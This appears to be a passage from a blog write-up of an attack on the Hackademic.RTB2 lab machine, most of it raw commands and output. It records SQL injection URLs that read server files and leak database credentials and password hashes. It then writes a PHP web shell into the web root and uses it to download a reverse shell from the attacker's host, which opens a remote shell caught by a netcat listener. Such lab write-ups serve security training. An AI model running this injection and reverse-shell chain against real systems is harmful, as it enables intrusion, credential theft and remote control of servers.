# 2. Directives that define the parameters of the 'main' or 'default' server,
# which responds to requests that aren't handled by a virtual host.
# These directives also provide default values for the settings
# of all virtual hosts.
# 3. Settings for virtual hosts, which allow Web requests to be sent to
# different IP addresses or hostnames and have them handled by the
# same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path. If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/apache2/foo.log"
# with ServerRoot set to "" will be interpreted by the
# server as "//var/log/apache2/foo.log".
#
### Section 1: Global Environment
#
# The directives in this section affect the overall operation of Apache,
# such as the number of concurrent requests it can handle or where it
# can find its configuration files.
#
#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE! If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the LockFile documentation (available
# at
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
ServerRoot "/etc/apache2"
#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
#
#
LockFile /var/lock/apache2/accept.lock
#
#
#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars
#
PidFile ${APACHE_PID_FILE}
#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300
#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On
#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100
#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 15
##
## Server-Pool Size Regulation (MPM specific)
##
# prefork MPM
# StartServers: number of server processes to start
# MinSpareServers: minimum number of server processes which are kept spare
# MaxSpareServers: maximum number of server processes which are kept spare
# MaxClients: maximum number of server processes allowed to start
# MaxRequestsPerChild: maximum number of requests a server process serves
StartServers 5
MinSpareServers 5
MaxSpareServers 10
MaxClients 150
MaxRequestsPerChild 0
# worker MPM
# StartServers: initial number of server processes to start
# MaxClients: maximum number of simultaneous client connections
# MinSpareThreads: minimum number of worker threads which are kept spare
# MaxSpareThreads: maximum number of worker threads which are kept spare
# ThreadsPerChild: constant number of worker threads in each server process
# MaxRequestsPerChild: maximum number of requests a server process serves
StartServers 2
MinSpareThreads 25
MaxSpareThreads 75
ThreadLimit 64
ThreadsPerChild 25
MaxClients 150
MaxRequestsPerChild 0
# event MPM
# StartServers: initial number of server processes to start
# MaxClients: maximum number of simultaneous client connections
# MinSpareThreads: minimum number of worker threads which are kept spare
# MaxSpareThreads: maximum number of worker threads which are kept spare
# ThreadsPerChild: constant number of worker threads in each server process
# MaxRequestsPerChild: maximum number of requests a server process serves
StartServers 2
MaxClients 150
MinSpareThreads 25
MaxSpareThreads 75
ThreadLimit 64
ThreadsPerChild 25
MaxRequestsPerChild 0
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
#
# AccessFileName: The name of the file to look for in each directory
# for additional configuration directives. See also the AllowOverride
# directive.
#
AccessFileName .htaccess
#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#
Order allow,deny
Deny from all
Satisfy all
#
# DefaultType is the default MIME type the server will use for a document
# if it cannot otherwise determine one, such as from filename extensions.
# If your server contains mostly text or HTML documents, "text/plain" is
# a good value. If most of your content is binary, such as applications
# or images, you may want to use "application/octet-stream" instead to
# keep browsers from trying to display binary files as though they are
# text.
#
DefaultType text/plain
#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off
# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a
# container, error messages relating to that virtual host will be
# logged here. If you *do* define an error logfile for a
# container, that host's errors will be logged there and not here.
#
ErrorLog /var/log/apache2/error.log
#
# LogLevel: Control the number of messages logged to the error_log.
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
#
LogLevel warn
# Include module configuration:
Include /etc/apache2/mods-enabled/*.load
Include /etc/apache2/mods-enabled/*.conf
# Include all the user configurations:
Include /etc/apache2/httpd.conf
# Include ports listing
Include /etc/apache2/ports.conf
#
# The following directives define some format nicknames for use with
# a CustomLog directive (see below).
# If you are behind a reverse proxy, you might want to change %h into %{X-Forwarded-For}i
#
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
#
# Define an access log for VirtualHosts that don't define their own logfile
CustomLog /var/log/apache2/other_vhosts_access.log vhost_combined
# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.
# Include generic snippets of statements
Include /etc/apache2/conf.d/
# Include the virtual host configurations:
Include /etc/apache2/sites-enabled/
Where is the www-root ???
http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/etc/apache2/sites-available/default%27%29
ServerAdmin webmaster@localhost
DocumentRoot /var/www/welcome
Options FollowSymLinks
AllowOverride None
>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
ErrorLog /var/log/apache2/error.log
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn
CustomLog /var/log/apache2/access.log combined
Alias /doc/ "/usr/share/doc/"
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
ServerAdmin webmaster@localhost
DocumentRoot /var/www
Options FollowSymLinks
AllowOverride None
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
ErrorLog /var/log/apache2/error.log
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn
CustomLog /var/log/apache2/access.log combined
Alias /doc/ "/usr/share/doc/"
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/var/www/welcome/check.php%27%29
<?php
$pass_answer = "' or 1=1--'";
$pass_answer_2 = "' OR 1=1--'";
if($_POST['password'] == $pass_answer or $_POST['password'] == $pass_answer_2){
echo '<h2>';
echo 'Ok, nice shot...';
echo '<br>';
echo '</h2>';
echo '...but, you are looking in a wrong place bro! ;-)';
echo '<br>';
echo '<br>';
echo '<font color="black">';
echo '%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%20%30%64%20%30%61%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%36%39%20%36%65%20%32%37%20%32%30%20%36%66%20%36%65%20%32%30%20%36%38%20%36%35%20%36%31%20%37%36%20%36%35%20%36%65%20%32%37%20%37%33%20%32%30%20%36%34%20%36%66%20%36%66%20%37%32%20%32%30%20%32%65%20%32%65%20%32%30%20%33%61%20%32%39%20%30%64%20%30%61%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%30%64%20%30%61%20%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%0A';
echo '</font color="black">';
}
else{
echo '<h2>';
echo 'You are trying to login with wrong credentials!';
echo '<br>';
echo '</h2>';
echo "Please try again...";
}
?>
URL decode :
3c 2d 2d 2d 2d 2d 2d 2d 2d 2d 3e 0d 0a 4b 6e 6f 63 6b 20 4b 6e 6f 63 6b 20 4b 6e 6f 63 6b 69 6e 27 20 6f 6e 20 68 65 61 76 65 6e 27 73 20 64 6f 6f 72 20 2e 2e 20 3a 29 0d 0a 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 0d 0a 3c 2d 2d 2d 2d 2d 2d 2d 2d 2d 3e
Hexa to asci :
<--------->
Knock Knock Knockin' on heaven's door .. :)
00110001 00110000 00110000 00110001 00111010 00110001 00110001 00110000 00110001 00111010 00110001 00110000 00110001 00110001 00111010 00110001 00110000 00110000 00110001
<--------->?
bin to asci:
1 0 0 1 : 1 1 0 1 : 1 0 1 1 : 1 0 0 1
binary to hex:
313030313A3131
binary to decimal
9:13:11:9
decimal to hex
9:D:B:9
I dunno what is this..... ?????
http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/var/www/index.php%27%29
<?php
/**
* @version $Id: index.php 14401 2010-01-26 14:10:00Z louis $
* @package Joomla
* @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/
// Set flag that this is a parent file
define( '_JEXEC', 1 );
define('JPATH_BASE', dirname(__FILE__) );
define( 'DS', DIRECTORY_SEPARATOR );
require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );
JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;
/**
* CREATE THE APPLICATION
*
* NOTE :
*/
$mainframe =& JFactory::getApplication('site');
/**
* INITIALISE THE APPLICATION
*
* NOTE :
*/
// set the language
$mainframe->initialise();
JPluginHelper::importPlugin('system');
// trigger the onAfterInitialise events
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
$mainframe->triggerEvent('onAfterInitialise');
/**
* ROUTE THE APPLICATION
*
* NOTE :
*/
$mainframe->route();
// authorization
$Itemid = JRequest::getInt( 'Itemid');
$mainframe->authorize($Itemid);
// trigger the onAfterRoute events
JDEBUG ? $_PROFILER->mark('afterRoute') : null;
$mainframe->triggerEvent('onAfterRoute');
/**
* DISPATCH THE APPLICATION
*
* NOTE :
*/
$option = JRequest::getCmd('option');
$mainframe->dispatch($option);
// trigger the onAfterDispatch events
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
$mainframe->triggerEvent('onAfterDispatch');
/**
* RENDER THE APPLICATION
*
* NOTE :
*/
$mainframe->render();
// trigger the onAfterRender events
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');
/**
* RETURN THE RESPONSE
*/
echo JResponse::toString($mainframe->getCfg('gzip'));
http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/var/www/configuration.php%27%29
<?php
class JConfig {
/* Site Settings */
var $offline = '0';
var $offline_message = 'This site is down for maintenance.<br /> Please check back again soon.';
var $sitename = 'Hackademic.RTB2';
var $editor = 'tinymce';
var $list_limit = '20';
var $legacy = '0';
/* Debug Settings */
var $debug = '0';
var $debug_lang = '0';
/* Database Settings */
var $dbtype = 'mysql';
var $host = 'localhost';
var $user = 'root';
var $password = 'yUtJklM97W';
var $db = 'joomla';
var $dbprefix = 'jos_';
/* Server Settings */
var $live_site = '';
var $secret = 'iFzlVUCg9BBPoUDU';
var $gzip = '0';
var $error_reporting = '-1';
var $helpurl = 'http://help.joomla.org';
var $xmlrpc_server = '0';
var $ftp_host = '127.0.0.1';
var $ftp_port = '21';
var $ftp_user = '';
var $ftp_pass = '';
var $ftp_root = '';
var $ftp_enable = '0';
var $force_ssl = '0';
/* Locale Settings */
var $offset = '0';
var $offset_user = '0';
/* Mail Settings */
var $mailer = 'mail';
var $mailfrom = 'admin@hackademirtb2.com';
var $fromname = 'Hackademic.RTB2';
var $sendmail = '/usr/sbin/sendmail';
var $smtpauth = '0';
var $smtpsecure = 'none';
var $smtpport = '25';
var $smtpuser = '';
var $smtppass = '';
var $smtphost = 'localhost';
/* Cache Settings */
var $caching = '0';
var $cachetime = '15';
var $cache_handler = 'file';
/* Meta Settings */
var $MetaDesc = 'Joomla! - the dynamic portal engine and content management system';
var $MetaKeys = 'joomla, Joomla';
var $MetaTitle = '1';
var $MetaAuthor = '1';
/* SEO Settings */
var $sef = '0';
var $sef_rewrite = '0';
var $sef_suffix = '0';
/* Feed Settings */
var $feed_limit = 10;
var $feed_email = 'author';
var $log_path = '/var/www/logs';
var $tmp_path = '/var/www/tmp';
/* Session Setting */
var $lifetime = '15';
var $session_handler = 'database';
}
?>
http://192.168.56.105/phpmyadmin
login: root / yUtJklM97W
http://192.168.56.105/phpmyadmin/index.php?db=joomla&token=1b7a1750b5f6d69cb6797631710e1959
jos_users Administrator Edit
pasword: test: be384a53bb01ae8acac1ea24dfdd065f:wpMwwAIdOLfdUbnSP9rhynCv0RLQvGQX
login Administrator / test
empty page...
http://192.168.56.105/phpmyadmin/sql.php?db=mysql&token=1b7a1750b5f6d69cb6797631710e1959&table=user&pos=0
localhost root *5D3C124406BF85494067182754131FF4DAB9C6C7
HackademicRTB2 root *5D3C124406BF85494067182754131FF4DAB9C6C7
127.0.0.1 root *5D3C124406BF85494067182754131FF4DAB9C6C7 Y
localhost debian-sys-maint *F36E6519B0B1D62AA2D5346EFAD66D1CAF248996
localhost phpmyadmin *5D3C124406BF85494067182754131FF4DAB9C6C7
--------------
phpmyadmin SQL query
http://192.168.56.105/phpmyadmin/tbl_sql.php?db=mysql&table=user&token=6ad2011913439a1e1d387f7182dc1322
SELECT '<? system($_GET["c"]); ?>'
INTO OUTFILE "/var/www/evil.php"
http://192.168.56.105:666/evil.php?c=ls%20-al%20/var/www
total 288
drwxrwxrwx 19 p0wnbox p0wnbox 4096 Nov 14 13:57 .
drwxr-xr-x 16 root root 4096 Jan 17 2011 ..
-rw-rw-rw- 1 root root 76539 Nov 3 2010 CHANGELOG.php
-rw-rw-rw- 1 root root 1172 Jan 26 2010 COPYRIGHT.php
-rw-rw-rw- 1 root root 14918 Nov 2 2010 CREDITS.php
-rw-rw-rw- 1 root root 4344 Jan 26 2010 INSTALL.php
-rw-rw-rw- 1 root root 17816 Jan 17 2009 LICENSE.php
-rw-rw-rw- 1 root root 27986 Jan 26 2010 LICENSES.php
-rwxrwxrwx 1 root root 21697 Jan 17 2011 Untitledt.png
drwxrwxrwx 7 root root 4096 Nov 3 2010 _installation
drwxrwxrwx 2 root root 4096 Jan 22 2011 administrator
drwxrwxrwx 2 root root 4096 Nov 3 2010 cache
drwxrwxrwx 15 root root 4096 Jan 22 2011 components
-rw-rw-rw- 1 www-data www-data 1793 Jan 17 2011 configuration.php
-rw-rw-rw- 1 root root 3411 Jan 26 2010 configuration.php-dist
-rw-rw-rw- 1 mysql mysql 26 Nov 14 13:57 evil.php
-rw-rw-rw- 1 root root 2773 Jan 26 2010 htaccess.txt
drwxrwxrwx 6 root root 4096 Nov 3 2010 images
drwxrwxrwx 8 root root 4096 Nov 3 2010 includes
-rw-rw-rw- 1 root root 2049 Jan 26 2010 index.php
-rw-rw-rw- 1 root root 588 Jan 26 2010 index2.php
-rw-rw-rw- 1 mysql mysql 20 Nov 14 13:55 info.php
drwxrwxrwx 4 root root 4096 Nov 3 2010 language
drwxrwxrwx 16 root root 4096 Nov 3 2010 libraries
drwxrwxrwx 2 root root 4096 Nov 3 2010 logs
drwxrwxrwx 3 root root 4096 Nov 3 2010 media
drwxrwxrwx 22 root root 4096 Nov 3 2010 modules
drwxr-xr-x 11 root root 4096 Jan 17 2011 pC4Hp8kt@Px8PgkV$!
drwxrwxrwx 11 root root 4096 Nov 3 2010 plugins
-rw-rw-rw- 1 root root 304 Aug 8 2006 robots.txt
drwxrwxrwx 7 root root 4096 Jan 17 2011 templates
drwxrwxrwx 2 root root 4096 Jan 22 2011 tmp
-rw-rw-rw- 1 mysql mysql 0 Nov 13 18:25 tmpurwmd.php
-rw-rw-rw- 1 mysql mysql 0 Nov 13 18:25 tmpuumnf.php
drwxrwxrwx 2 root root 4096 Nov 14 11:57 welcome
drwxrwxrwx 4 root root 4096 Nov 3 2010 xmlrpc
-rw-rw-rw- 1 root root 177 Jan 17 2011 xxx.html
http://192.168.56.105:666/evil.php?c=which%20wget
/usr/bin/wget
192.168.56.105:666/evil.php?c=wget -O phpreverse.php http://192.168.56.101/phpshells/phpreverse.txt
root@kali:~# nc -l -v -p 1234
listening on [any] 1234 ...
http://192.168.56.105:666/phpreverse.php
192.168.56.105: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.105] 59158
Linux HackademicRTB2 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686 GNU/Linux
14:59:22 up 1 day, 5:10, 0 users, load average: 0.01, 0.04, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$
Next step: Privilege escalation.
Nincsenek megjegyzések:
Megjegyzés küldése
Megjegyzés: Megjegyzéseket csak a blog tagjai írhatnak a blogba.